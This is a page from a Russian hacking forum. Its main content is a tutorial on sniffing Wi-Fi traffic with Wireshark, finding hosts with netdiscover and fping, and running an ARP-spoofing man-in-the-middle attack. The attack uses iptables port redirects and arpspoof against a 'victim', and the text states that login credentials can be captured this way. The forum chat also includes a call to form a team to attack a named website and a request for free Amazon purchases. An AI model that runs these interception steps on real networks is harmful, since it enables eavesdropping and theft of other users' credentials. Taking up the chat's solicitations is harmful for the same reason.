Интересное в сети
Форум happy-hack.ru
Мы Вконтакте
Посетители

Сейчас на сайте: 16
Пользователей: 0
Гостей: 15

Пользователи онлайн: 


- отсутствуют

Гости (20 последних): 



Роботы: 

Статистика




Чат

Чтобы оставлять сообщения - зарегистрируйтесь
  • admin
    22 апр 2023, 22:46
    *Diablomy, привет дружище
    • Diablomy
      22 апр 2023, 14:50
      смайликом промахнулся
      • Diablomy
        22 апр 2023, 14:49
        Фигасе, лет 10 меня не было тут admin привет!
        • admin
          10 апр 2023, 05:55
          *voska89, no
          • voska89
            10 апр 2023, 01:41
            Helli admin ! PLease upgrade my account to group uploader . I am uploader soft and ebook
            • admin
              2 мар 2023, 23:18
              *Ytkanos1337, сайту 12 лет и некоторые старые и неактуальные на сегодняшний день разделы и темы могут быть удалены.
              • Ytkanos1337
                28 фев 2023, 13:41
                Почему "Внимание! Обнаружена ошибка
                Пользователи не имеют доступа для просмотра статей из данного раздела." ?
                • Proton
                  22 фев 2023, 00:25
                  Кому нужен ворк пишите мне
                  • valery17
                    16 фев 2023, 16:32
                    На сайте очень много битых ссылок. Непорядок!
                    • Джакомо
                      12 янв 2023, 12:28
                      Собираю команду. цель убийство сайта миротворец !
                      • tversetty
                        9 янв 2023, 13:41
                        я на триаланет еще сидел и уфолабс, были 3 самых топовых сайта на dle. сейчас одни форумы, я рот ебал их
                        • tversetty
                          9 янв 2023, 13:37
                          у тебя же сайт за клаудфларой, почему боишься яровой?
                          • tayfun221
                            8 окт 2022, 18:29
                            Всем привет как выложить видео в тик ток ?
                            • Maxonix
                              2 сен 2022, 03:15
                              Нужно задать алгоритм, чтобы с нужного сайта мне такие картинки прислало
                              • Maxonix
                                2 сен 2022, 03:15
                                Тут кто нибудь может помочь , а то ни разобрался?
                                • Maxonix
                                  2 сен 2022, 03:14
                                  Всем привет
                                  • Twiksar
                                    24 авг 2022, 12:38
                                    Кто знает, как покупать на Амазоне бесплатно? Помогите пожалуйста, буду очень благодарен.
                                    • Kvakowski
                                      6 авг 2022, 21:29
                                      • Hades1234
                                        21 июл 2022, 22:52
                                        для соц сетей номера телефонов. По ключевым фразам. Помню были на форуме проги.
                                        • Hades1234
                                          21 июл 2022, 22:51
                                          Ребят подстажите парсер
                                          • Hades1234
                                            21 июл 2022, 22:51
                                            Всем привет!
                                            • Братишка
                                              2 июл 2022, 18:47
                                              Как мариноват огурци
                                              • MAZAXAKER
                                                21 июн 2022, 21:04
                                                Admin, передай привет SyGaK. ИНШААЛЛАХ!
                                                • admin
                                                  14 июн 2022, 10:17
                                                  • marselshou
                                                    6 июн 2022, 16:55
                                                    у кого есть прога Atomic Warez Leecher? дайте пж вк od marselshowyoutube
                                                    • Kvakowski
                                                      26 апр 2022, 12:56
                                                      *Jons, привет
                                                      • Jons
                                                        25 апр 2022, 05:15
                                                        Привет всем
                                                        • Alexsandr7
                                                          10 апр 2022, 17:25
                                                          ОТДАМ АКК ВК
                                                          • kanistra
                                                            23 мар 2022, 14:49
                                                            Ребят как найти generate death by up0 v 5.0 немогк найти?
                                                            • tayfun221
                                                              22 мар 2022, 20:13
                                                              или любой другой ,может кто написать сможет ,что бы автоматом подключалс к Пулу . И вывод был ,готов с таким человеком поработать .Серьезно .
                                                              Опрос на сайте
                                                              Как Вы нашли нас?

                                                              Анализ информации внутри сети Wi-Fi

                                                              Автор: admin | Дата: 13-04-2018, 17:10 | Комментариев: 0 | Просмотров: 30 493
                                                              Анализ информации внутри сети Wi-Fi


                                                              Установка и запуск WireShark

                                                              WireShark - это известная утилита для анализа сетей. Для операционной системы Kali Linux она предоставлена в комплекте с набором основных программ. Есть версия для любителей Windows. Для установки на другие ОС Linux можно воспользоваться такой командой:

                                                              sudo apt-get install wireshark


                                                              После установки запустим утилиту. Можно запустить с помощью команды:

                                                              sudo wireshark




                                                              Дальше необходимо выбрать один из предложенных интерфейсов и начать анализ трафика. После запуска интерфейс программы будет разделен на три блока.



                                                              1. блок - настройка и управления утилитой.
                                                              2. блок - пакеты, которые были перехвачены.
                                                              3. блок - информация для расшифровки и получения данных с пакетов.


                                                              Для тестирования можно открыть браузер и начать заходить на разные сайты, входить в формы авторизации, добавлять картинки и т.д. Потом можно остановить wireshark и посмотреть, какие данные были получены.

                                                              Но так как в нашу утилиту попадают тонны трафика, то нужно использовать фильтры:

                                                              1. ip.proto - протокол 
                                                              2. ip.src - отправитель 
                                                              3. ip.dst - получатель 
                                                              4. ip.addr - любой адрес


                                                              Фильтры поддерживают использование логических операторов и выражений:

                                                              == - присваивание 
                                                              || - логическое или 
                                                              & - логическое и 
                                                              > - больше 
                                                              < - меньше


                                                              На примере можно использовать метод "GET". Введем в поле фильтра запрос "http.request.method == "GET". Находим запись и нажимаем правой кнопкой мыши Follow->TCP Stream. У меня получилось проанализировать пакет, в котором была загружена картинка на хост. Был получен формат, а также другая информация в USEr-Agent. Вот такими способами можно отсеивать не нужную информацию и искать полезные данные в WireShark. Таким способом можно получить авторизационные данные, а также полностью расшифровывать пакеты "telnet".

                                                              Пример перехваченного пакета



                                                              Сбор информации

                                                              Далее нам нужно получить информацию о пользователях. Для этого можно использовать две утилиты netdiscover и fping. Начнем с первой, чтобы быстро получить список активных участников сети можно воспользоваться Nmap или netdiscover, но последний способ быстрее.

                                                              sudo netdiscover


                                                              После этого получаем информацию об участниках сети.

                                                              Участники сети



                                                              Если у вас очень много участников в сети, то можно воспользоваться утилитой fping. Для того чтобы просканировать необходимо ввести команду. После этого активные хосты будут отображены в файле:

                                                              fping -Asg 192.168.1.0/24 -r 3 >> hosts_active.txt




                                                              Эту информацию можно использовать в WireShark. Например, для фильтрации по конкретному IP, можно воспользоваться командой:

                                                              ip.addr==192.168.0.100


                                                              Фильтрация по IP



                                                              Или, например, фильтрация по MAC-адресу:

                                                              eth.addr==68:3e:xx:xx:xx:xx


                                                              Фильтрация по MAC-адресу



                                                              Можно комбинировать запросы логическим «или» - ||:

                                                              eth.addr==68:3e:xx:xx:xx:xx || igmp


                                                              Комбинирование двух разных запросов



                                                              MITM-атака

                                                              Это, по сути, процесс, когда вы располагаетесь между роутером и пользователем сети и начинаете слушать все пакеты. Принцип действий хорошо показан на картинке:



                                                              Для этих задач есть специальные утилиты, но можно сделать все и ручками. Для этого необходимо сначала включить IP-форвординг и изменить правила iptablex:

                                                              sudo cat /proc/sys/net/ipv4/ip_forward #Проверка форвординга пакетов, если -включен, если 0-выключен.
                                                              
                                                              echo "1" > /proc/sys/net/ipv4/ip_forward #Включаем форвординг пакетов 
                                                              
                                                              iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8282 #Перенаправляем трафик с 80 порта на 8282 
                                                              
                                                              iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8282 #Перенаправляем трафик с 443 порта на 8282




                                                              Далее необходимо запустить команду. Перед этим обязательно запустить WireShark для снифа трафика, чтобы потом его можно было проанализировать:

                                                              arpfpoof -i <interface> -t <жертва> <шлюз>


                                                              Например, если вы проводите эту атаку в сети и IP нашей цели 192.168.0.100, то команда будет иметь такой вид:

                                                              arpspoof -i wlp3s0 -t 192.168.0.100 192.168.0.1




                                                              Далее с фильтрами и другими данными информация анализируется в WireShark.

                                                              Заключение

                                                              Внимательно относитесь к использованию Wi-Fi в публичных сетях. Возможно, кто-то перехватывает ваш трафик. Поэтому лучшие не использовать недостоверные сети для передачи важных и конфиденциальных данных.

                                                              Пароль на все архивы: hh


                                                              Теги: Wi-Fi WireShark netdiscover перехват трафик

                                                              Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
                                                              Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.
                                                              Добавление комментария
                                                              Имя:*
                                                              E-Mail:
                                                              • bowtiesmilelaughingblushsmileyrelaxedsmirk
                                                                heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
                                                                winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
                                                                worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
                                                                expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
                                                                disappointedconfoundedfearfulcold_sweatperseverecrysob
                                                                joyastonishedscreamtired_faceangryragetriumph
                                                                sleepyyummasksunglassesdizzy_faceimpsmiling_imp
                                                                neutral_faceno_mouthinnocent
                                                              Вопрос: 3 прибавить одиннадцать и всё это разделить на два (ответ прописью).
                                                              Ответ:*
                                                              Введите два слова, показанных на изображении: *